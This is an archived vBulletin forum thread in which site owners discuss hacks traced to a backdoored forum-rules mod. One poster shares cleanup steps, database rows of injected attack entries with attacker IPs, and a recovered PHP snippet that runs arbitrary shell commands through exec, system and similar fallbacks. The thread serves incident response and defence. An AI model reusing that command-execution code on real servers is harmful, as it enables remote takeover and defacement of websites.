The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#31
|
||||
|
||||
Ugh! Again? I just got the email as well. Wonder whats wrong now? >< Poor Valter.
|
#32
|
|||
|
|||
I keep reading "hacked by team Anus".
|
#33
|
|||
|
|||
For future reference, don't PM. I'm told the correct thing to do would have been to click on "Report this Post" in the mod thread.
|
#34
|
|||
|
|||
Quote:
uninstall this rotten back door to hell. it is now without a doubt that it has not been fixed, no matter the claims. it's getting to the point where you have to wonder if it's some kind of conspiracy or something. :down: it' is not a case where they breached before and were "waiting". i was only hacked after i upgraded to v4.0.4 and not before. UNINSTALL ANY AND ALL MODS - PERIOD!! |
#35
|
||||
|
||||
Removing all mods is a little extreme, don't you think?
|
#36
|
|||
|
|||
While I do understand your frustration about everything, I kind of agree with Boofo here. Uninstalling every mod is a little extreme.
|
#37
|
|||
|
|||
yeah, sure. i suppose you could change that to all cyb mods.
but in my case i only ever used one mod. the cyb afr one. i uninstalled it and also decided to keep my vb forum vanilla. apart from changing colors and stuff from within it, that is it for me. lesson learned. i'm too much a control freak to allow myself to be "violated" again. :P (one rape is enough) |
#38
|
|||
|
|||
Quote:
If you were hacked again - you didn't completely purge the server of the exploitable code. Ensure that all copies of vba.php have been removed: /forum/includes/vba.php /forum/includes/xml/vba.php Also - check (or get your host to check) your server logs for access. Also - do a full scan of the database; as we had base64 data encoded into the database in the rtable field within the guest table. Entries I removed: | guestid | hostip | useragent | lastactive | spider | script | rdata | a33ea4abd15916de0fe47c20e8efc48f | 203.147.62.92 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1278294864 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:262:" PHP Code:
| 1eafdc25e937348e21e2bb1158b73c48 | 193.71.28.34 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1279528160 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:" PHP Code:
| 544953a2c138f10bf32df7677065d1ed | 205.251.131.33 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1279527971 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:" PHP Code:
| 494edcf8661b32d80c1078019f0f25a7 | 208.64.68.228 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1280926630 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:" PHP Code:
| 13640f07244b04a849cb78f5c8fc4dbf | 61.47.40.39 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1285330209 | | externalframe | a:9:{s:3:"ref";s:37:"http:/www.t...om/cephcare/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:" PHP Code:
| ad7b15b9bdcf0993071e56659d065a9e | 110.45.165.22 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1290781080 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:" PHP Code:
| 23cf7b6e31cd2d81162dc26542cb3f10 | 70.38.37.151 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1290961798 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:" PHP Code:
| b70f8e63432d70f392cc060fdc411975 | 174.121.219.80 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1294083379 | | showthread | a:8:{s:6:"postid";i:346415;s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:" PHP Code:
| 51da94725eda052743162729a45c12e4 | 67.192.224.98 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30 | 1294480629 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:919:" PHP Code:
| 4fe82d2e1e7c29e795a3d5617e803d3b | 195.42.120.131 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1295022885 | | forumdisplay | a:9:{s:1:"f";s:14:"49/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:" PHP Code:
| 2f85afe9e6bf839981d96c6482d2b90d | 199.124.61.2 | Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/ | 1295771568 | | showthread | a:9:{s:1:"p";s:18:"347103/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:" PHP Code:
| ffb65c6cc094dcbfbb05b96e368d9c53 | 208.91.57.65 | Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9 | 1295778092 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:" PHP Code:
| e783bb5c77bf9a59f9d63d9551a53cd6 | 81.94.196.51 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1297787694 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:" PHP Code:
| bbc645e5264e506520e938c779d4f23d | 67.192.224.98 | Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4 | 1298619810 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:919:" PHP Code:
...cont'd in next post due to character limits |
#39
|
|||
|
|||
| 8c4734033eff728379948bcfb8f45653 | 202.136.168.37 | Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/ | 1299793822 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"
PHP Code:
| 9f0427858f5c797717a3aaf69e082c01 | 207.58.131.77 | Mozilla/3.0 (X11; I; SunOS 5.4 sun4m) | 1300883385 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:" PHP Code:
| c1d576eaa0bf6e9b1867413a940cf56a | 207.58.131.77 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 | 1300883385 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:" PHP Code:
| c3f76c51b678d379c20cbbc5580e20ad | 80.38.87.254 | Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | 1301251374 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:" PHP Code:
| 85fbda11bb0d353a5b4db40ad309b0dc | 88.80.207.132 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b | 1301678740 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:" PHP Code:
| f7b4a57131b4887a2a1eea92376e9697 | 205.204.32.194 | Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320) | 1302083349 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:" PHP Code:
| f8b72c4b4b12138accc7f62c2692ce98 | 183.99.33.109 | Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | 1305032315 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:" PHP Code:
One way people make mass chances of that nature is to use a mass defacer script. In part the code I removed from the database did allow for php or shell commands to be executed without placing files into the account. One occurrence was at: Tue May 10 07:58:35 CDT 2011 by this IP: 183.99.33.109 Code:
echo "v0pCr3w "; echo "sys:".php_uname()." "; $cmd="echo nob0dyCr3w"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } |
#40
|
|||
|
|||
Anyone who was using the old version of the Advanced Forum Rules mod, any version, could/was suspect to hackers. There is a fixed update somewhere. Best thing to do is uninstall the mod, remove all files from the server, and re-upload the updated version.
|
Thread Tools | |
Display Modes | |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|